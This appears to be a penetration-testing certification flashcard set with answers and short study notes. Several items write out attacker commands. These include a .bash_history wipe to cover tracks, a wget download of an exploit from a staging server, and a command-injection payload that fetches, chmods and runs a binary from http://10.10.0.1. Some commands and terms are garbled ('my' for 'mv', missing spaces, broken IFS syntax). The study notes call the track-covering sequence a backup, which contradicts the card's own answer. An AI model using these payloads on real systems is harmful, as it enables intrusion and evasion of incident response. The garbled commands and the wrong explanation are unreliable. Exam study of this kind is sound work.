Shell Scripting and Permissions

Questions and Answers

Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?

• chmod u+x script.sh (correct)
• chmod u+e script.sh
• chmod o+e script.sh
• chmod o+x script.sh

A penetration tester gains access to a system and establishes persistence, and then run the following commands:

cat /dev/null > temp touch -r .bash_history temp my temp .bash_history

Which of the following actions is the tester MOST likely performing?

• Redirecting Bash history to /dev/null
• Making a copy of the user's Bash history to further enumeration
• Covering tracks by clearing the Bash history (correct)
• Making decoy files on the system to confuse incident responders

A compliance-based penetration test is primarily concerned with:

• obtaining PII from the protected network.
• bypassing protection on edge devices.
• determining the efficacy of a specific set of security standards. (correct)
• obtaining specific information from the protected network.

A penetration tester is explaining the MITRE ATT&CK framework to a company's chief legal counsel. Which of the following would the tester MOST likely describe as a benefit of the framework?

Understanding the tactics of a security intrusion can help disrupt them. (A)

Which of the following BEST describe the OWASP Top 10? (Choose two.)

The most critical risks of web applications (A), The risks defined in order of importance (C)

A penetration tester discovered a vulnerability that provides the ability to upload to a path via discovery traversal. Some of the files that were discovered through this vulnerability are:

https://xx.xx.xx.x/vpn/../vpns/portal/scripts/newbm.pl https://xx.xx.xx.x/vpn/../vpns/portal/scripts/rmbm.pl https://xx.xx.xx.x/vpn/../vpns/portal/scripts/picktheme.pl https://xx.xx.xx.x/vpn/../vpns/cfg/smb.conf

Which of the following is the BEST method to help an attacker gain internal access to the affected machine?

Edit the discovered file with one line of code for remote callback. (A)

A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data. Which of the following should the tester verify FIRST to assess this risk?

Whether sensitive client data is publicly accessible (A)

A penetration tester ran the following command on a staging server: python -m SimpleHTTPServer 9891 Which of the following commands could be used to download a file named exploit to a target machine for execution?

wget 10.10.51.50:9891/exploit (D)

A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:

exploit "POST" exploit + "/cgi-bin/index.cgi?action-login&Path-%27%0A/bin/sh${sytem.IFS())- c$ { system. IFS () }' cd$ { system. IFS ()}/tmp; ${system. IFS () } wget$ { system. IFS () } http://10.10.0.1/apache; ${system. IFS () } chmod$ { system. IFS () }777 $(system. IFS () } apache${system. IFS ()}./apache' %0A%27&loginUSer=a&pwd=a" exploit += "HTTP/1.1"

Which of the following commands should the penetration tester run post-engagement?

rm -rf /tmp/apache (B)

Which of the following is MOST important to include in the final report of a static application-security test that was written with a team of application developers as the intended audience?

Code context for instances of unsafe typecasting operations (D)

Flashcards are hidden until you start studying

Study Notes

Bash History Management

• The provided code snippet demonstrates a sequence of commands intended to manage the Bash history file, .bash_history.
• The commands involve creating, modifying, and renaming files to ultimately overwrite the existing .bash_history file with a potentially updated version.
• The first command, cat /dev/null > temp, initializes an empty file named "temp" by redirecting the output of /dev/null (an empty device) to it.
• The second command, touch -r.bash_history temp, updates the timestamp and metadata of the "temp" file to match those of the .bash_history file, potentially preserving crucial information about the history file.
• Finally, mv temp.bash_history renames the "temp" file to .bash_history, effectively overwriting the original .bash_history file with the modified "temp" file.
• The overall purpose of these commands suggests a process for either backing up or manipulating the .bash_history, a file crucial for maintaining and recalling previously executed commands within a shell.